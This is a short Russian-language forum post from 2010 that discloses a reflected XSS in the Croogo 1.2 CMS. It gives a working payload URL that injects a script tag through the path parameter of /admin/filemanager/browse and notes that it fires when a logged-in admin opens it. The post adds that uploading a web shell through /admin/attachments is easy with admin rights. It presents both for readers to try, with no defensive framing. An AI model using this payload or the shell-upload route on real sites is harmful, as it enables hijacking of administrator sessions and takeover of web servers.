03.02.2010, 14:18
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Croogo 1.2
(Геморная маленько)
Пассивная XSS
/admin/filemanager/browse?path=%22%3E%3Cscript%3Ealert();%3C/script%3E
Сработает на админе если он авторизированный.
ps
Залить шелл легко (Права админа нужны)
/admin/attachments
Там я думаю догадаетесь.
Последний раз редактировалось Ctacok; 03.02.2010 в 14:20..
|
|
|